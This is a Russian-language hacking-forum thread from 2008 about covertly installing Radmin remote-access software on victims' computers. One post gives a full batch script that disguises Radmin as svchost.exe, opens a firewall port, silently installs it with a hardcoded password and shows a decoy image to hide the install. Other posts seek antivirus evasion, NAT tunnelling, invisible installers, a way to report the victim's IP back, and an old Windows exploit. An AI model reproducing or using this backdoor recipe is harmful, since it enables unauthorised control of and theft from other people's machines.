HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > АнтиАдмин
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.02.2008, 18:35
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

такой код стоит деньги))) название таких кодов сплоиты под бравзера.. посмотри в топике продажа.
 

  #2  
Старый 02.03.2008, 14:19
}I{ek
Новичок
Регистрация: 08.02.2008
Сообщений: 12
Провел на форуме:
64407

Репутация: 2
По умолчанию

Супер!
 

  #3  
Старый 12.03.2008, 15:10
maximusb
Новичок
Регистрация: 12.03.2008
Сообщений: 3
Провел на форуме:
173607

Репутация: 0
По умолчанию

Помогите. Скачал архив, тот который http://sec-123.narod.ru/radmin/6.rar Установил у жертвы дома (запускал и огни.exe и config.bat Запускаю у себя R Viewer 3.0... Пишет "Не удается соединиться с сервером" И так пробовал на разных машинах... Везде одно и то же... Помогите плиз... Стукните в аську... 213887672
 

  #4  
Старый 17.03.2008, 17:39
eazy
Новичок
Регистрация: 15.01.2008
Сообщений: 15
Провел на форуме:
47820

Репутация: 2
По умолчанию

Hello ,

This is some tweak for Radmin i make myself
1.Get Radmin files from this post
2.Get compiler
3.Compilee Radmin files with needed files
4.Add some icon and invisibility for .exe
What's happen when you run the compiled .exe

Код:
mkdir %SYSTEMROOT%\help\Tours\nnTour

copy /y "%MYFILES%\svchost.exe" "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe"

copy /y "%MYFILES%\raddrv.dll" "%SYSTEMROOT%/help/Tours/nnTour/raddrv.dll"

copy /y "%MYFILES%\AdmDll.dll" "%SYSTEMROOT%/help/Tours/nnTour/AdmDll.dll"

copy /y "%MYFILES%\111.bat" "%SYSTEMROOT%/help/Tours/nnTour/111.bat"

copy /y "%MYFILES%\111.reg" "%SYSTEMROOT%/help/Tours/nnTour/111.reg"

netsh firewall add portopening protocol = TCP port = 53221 name = TCP

reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg

reg delete  "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f

reg import "%SYSTEMROOT%/help/Tours/nnTour/111.reg

regedit /s "%SYSTEMROOT%/help/Tours/nnTour/111.reg

"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /install /silence

"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /start

"%MYFILES%\1.jpg"
1. Make folder %SYSTEMROOT%\help\Tours\nnTour
2.Copy all needed files in %SYSTEMROOT%\help\Tours\nnTour
3.Open MS firewall with name "TCP" and port "53221"
netsh firewall add portopening protocol = TCP port = 32554 name = TCP

4.Import needed registry
5.Install radmin save everything use silence for icon and pass r1st0n and port 53221
- "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
- Start Radmin server
6.Open 1.jpg
When user run the exe at end after 1-2 sec.s he see the 1.jpg
You can make some tweeks to delete the reg and .bat files after install

With quick.batch.file.compiler you can import little files this was perfect to import :
svchost.exe ,raddrv.dll,AdmDll.dll,111.bat,111.reg,

Next thing is if someone can help is how to import some script or report how will give me the victim IP address for example if someone download it from HTTP and run it how to see the victim IP if someone can help I will be glad

Greetings


RADMIN FILES
 

  #5  
Старый 18.04.2008, 15:11
muhaha
Новичок
Регистрация: 30.03.2008
Сообщений: 1
Провел на форуме:
653

Репутация: 0
По умолчанию

ПОмогите пожалуста найти сплоит ms04011.exe/// всё обыскал не могу найти
 

  #6  
Старый 02.05.2008, 09:50
Glynec
Участник форума
Регистрация: 30.01.2008
Сообщений: 113
Провел на форуме:
601349

Репутация: 47
По умолчанию

Спс +
 

  #7  
Старый 16.05.2008, 01:07
XENON4IK
Участник форума
Регистрация: 22.04.2007
Сообщений: 135
Провел на форуме:
637994

Репутация: 203
Отправить сообщение для XENON4IK с помощью ICQ
По умолчанию

Как подключиться к серверу Радмина если он за Nat? насколько я понимаю надо создать туннель на другой серв и через него пустить Радмина, а самому коннектится уже к тому серву через который пустил Радмина.... Если я правильно мыслю, то как это реализовать?
 

  #8  
Старый 22.05.2008, 03:26
S1lveR
Новичок
Регистрация: 21.05.2008
Сообщений: 4
Провел на форуме:
18660

Репутация: 2
По умолчанию

Может кто сможет сделать такую же сборку только из 3 радмина? Т.к он антивирами не палится... Пробовал сам сделать что то подобное (чтобы работал нужно регать как серивс, регал с помошью утилиты srvany.exe, и запись в реестре).. Работало все кроме "Управления мышью и клавиатурой удаленного компьютера", ну и просто просмотра соответственно. Тупо не коннектилось. Знаю что для этого нужно как то подключить драйвер raddrvv3.sys из папки с сервером, но не знаю как это сделать. А остальное все (telnet, передача файлов, выключение и т.д) отлично работало. Может у кого получится. Заранее спасибо
 

  #9  
Старый 22.05.2008, 16:06
XiICE
Новичок
Регистрация: 21.05.2008
Сообщений: 1
Провел на форуме:
520

Репутация: 0
По умолчанию

Слушайте, может кто знает как файл-инсталер создать, чтобы невидимо устанавливался, прописал пароль и порт
Что то вроде инсталшилда или мультисета, только невидимо
 

  #10  
Старый 22.05.2008, 22:47
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Цитата:
Сообщение от XiICE  
Слушайте, может кто знает как файл-инсталер создать, чтобы невидимо устанавливался, прописал пароль и порт
Что то вроде инсталшилда или мультисета, только невидимо
Кидаю ещё раз ман по работе с рессурсами...(C++ Builder):
http://wladm.narod.ru/Borland/res.html

Делов то ... на 15 минут....
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ